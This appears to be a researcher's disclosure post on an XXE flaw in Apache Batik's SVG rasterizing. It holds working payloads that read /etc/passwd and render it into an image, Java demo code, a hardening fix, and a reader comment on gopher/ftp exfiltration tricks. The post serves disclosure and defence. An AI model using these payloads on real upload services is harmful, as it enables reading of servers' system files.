In this particular case, the web application lets its clients upload a Scalable Vector Graphics document (SVG file) and receive the contents of the file as a rasterized JPG or PNG file. Because SVG files are represented as XML, the parsing routine is potentially prone to XXE injection attacks. As I dug deeper, I found out that a third-party library called [i]Apache XMLgraphics Batik[/i] is used for parsing and converting the SVG files, so I implemented a small sample application which uses the SVG to PNG/JPG transcoding classes in the same way the investigated web application does. Now I had to find a payload that would extract data from the target's filesystem, so first I tried the following:
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
As no exception was raised, I concluded that the payload had been parsed without errors, but the resulting JPG/PNG file was empty. This happened because my payload did lead to the evaluation of the external reference (/etc/passwd), but the result was not rendered anywhere, so I had to find a way to return its contents. Fortunately, SVG offers the possibility to place text into images with the <text> tag, so my modified payload looked like this:
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text></svg>
This results in a JPG file that shows the contents of /etc/passwd as rendered text.
This works with all versions of Apache Batik (1.0 – 1.7).
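The reason the second payload leaks data can be reproduced without Batik. The following is a minimal sketch that uses only the JDK's built-in DOM parser, not Batik's transcoder classes, and a harmless temporary file instead of /etc/passwd. The class name `EntityExpansionDemo` and its helper methods are hypothetical names chosen for illustration, and the sketch assumes a JDK whose default parser settings still resolve external entities.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class EntityExpansionDemo {

    // Builds an SVG whose <text> node references an external entity (hypothetical helper).
    static String buildSvg(String fileUri) {
        return "<?xml version=\"1.0\" standalone=\"yes\"?>"
            + "<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM \"" + fileUri + "\" > ]>"
            + "<svg xmlns=\"http://www.w3.org/2000/svg\" version=\"1.1\">"
            + "<text x=\"10\" y=\"40\">&xxe;</text></svg>";
    }

    // Writes `secret` to a temp file, parses an SVG that references that file
    // with an unhardened parser, and returns the text content of the document.
    // `secret` must be plain text without XML special characters.
    static String roundTrip(String secret) {
        Path file = null;
        try {
            file = Files.createTempFile("xxe-demo", ".txt");
            Files.write(file, secret.getBytes(StandardCharsets.UTF_8));

            String svg = buildSvg(file.toUri().toString());
            // Default factory: no hardening features are set here on purpose.
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(svg.getBytes(StandardCharsets.UTF_8)));

            // The entity is expanded inside <text>, so the file contents
            // become ordinary character data that a renderer would draw.
            return doc.getDocumentElement().getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException("demo failed", e);
        } finally {
            if (file != null) {
                file.toFile().delete();
            }
        }
    }

    public static void main(String[] args) {
        System.out.println(roundTrip("marker-from-local-file"));
    }
}
```

Once the entity has been expanded into the text node, any component that renders the text (as an SVG rasterizer does) hands the file contents back to the attacker.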
The responsible disclosure process with Apache was very pleasant, fast and professional. After two e-mail exchanges they provided a fix (Batik version 1.8) which disables the evaluation of external entities.
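The actual Batik 1.8 patch is not reproduced here. As a rough illustration of what "disabling the evaluation of external entities" can look like, here is a sketch using the JDK's own DOM parser and its standard SAX/Xerces feature flags. The class `HardenedParserDemo` and its methods are hypothetical, and this is not necessarily how Batik implements its fix.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class HardenedParserDemo {

    // Returns a factory that refuses to load external entities and external DTDs.
    static DocumentBuilderFactory hardenedFactory() {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            factory.setXIncludeAware(false);
            return factory;
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException("parser does not support hardening features", e);
        }
    }

    // Returns true only if parsing an XXE payload with `factory` exposes `secret`.
    // `secret` must be plain text without XML special characters.
    static boolean leaks(DocumentBuilderFactory factory, String secret) {
        Path file = null;
        try {
            file = Files.createTempFile("xxe-hardening", ".txt");
            Files.write(file, secret.getBytes(StandardCharsets.UTF_8));
            String svg = "<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM \"" + file.toUri() + "\" > ]>"
                + "<svg xmlns=\"http://www.w3.org/2000/svg\"><text>&xxe;</text></svg>";
            String text = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(svg.getBytes(StandardCharsets.UTF_8)))
                .getDocumentElement().getTextContent();
            return text.contains(secret);
        } catch (SAXException e) {
            return false; // the parser rejected the document, so nothing leaked
        } catch (IOException | ParserConfigurationException e) {
            throw new IllegalStateException("demo failed", e);
        } finally {
            if (file != null) {
                file.toFile().delete();
            }
        }
    }

    public static void main(String[] args) {
        System.out.println("default parser leaks:  "
            + leaks(DocumentBuilderFactory.newInstance(), "marker"));
        System.out.println("hardened parser leaks: "
            + leaks(hardenedFactory(), "marker"));
    }
}
```

Applications that never need a DOCTYPE can go further and set the `http://apache.org/xml/features/disallow-doctype-decl` feature to `true`, which makes the parser reject such payloads outright.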
The security advisory can be downloaded here:
https://www.ernw.de/download/xxe_batik.tar.xz (SHA1: 7fe692922ca150a8aa20b2469ab20f8b8dc85543)
Quick note: side-channel exfiltration is very useful in this specific case. Newlines are invisible when placed in an SVG text node. The gopher/ftp trick allows you to list directories and read files with ease.
I exploited this same vulnerability last year. Good job on reporting it!